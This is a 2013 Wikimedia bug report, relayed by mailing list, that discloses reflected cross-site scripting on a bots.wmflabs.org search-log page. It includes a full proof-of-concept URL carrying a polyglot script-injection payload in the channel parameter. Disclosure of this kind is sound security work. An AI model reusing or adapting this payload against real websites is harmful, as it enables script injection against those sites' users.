[Bug 44618] New: http://bots.wmflabs.org cross site scripting

Sun, 03 Feb 2013 05:39:24 -0800 

https://bugzilla.wikimedia.org/show_bug.cgi?id=44618

       Web browser: ---
            Bug ID: 44618
           Summary: http://bots.wmflabs.org cross site scripting
           Product: Wikimedia Labs
           Version: unspecified
          Hardware: PC
                OS: Windows XP
            Status: UNCONFIRMED
          Severity: normal
          Priority: Unprioritized
         Component: bots
          Assignee: benap...@gmail.com
          Reporter: insecurity...@gmail.com
                CC: wikibugs-l@lists.wikimedia.org
    Classification: Unclassified
   Mobile Platform: ---

Created attachment 11720
  --> https://bugzilla.wikimedia.org/attachment.cgi?id=11720&action=edit
xss

xss in url.

test on mozilla firefox browser.

http://bots.wmflabs.org/~wm-bot/searchlog/index.php?action=search&channel=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%23%23thinewiki

-- 
You are receiving this mail because:
You are on the CC list for the bug.
You are watching all bug changes.
_______________________________________________
Wikibugs-l mailing list
Wikibugs-l@lists.wikimedia.org
https://lists.wikimedia.org/mailman/listinfo/wikibugs-l

Reply via email to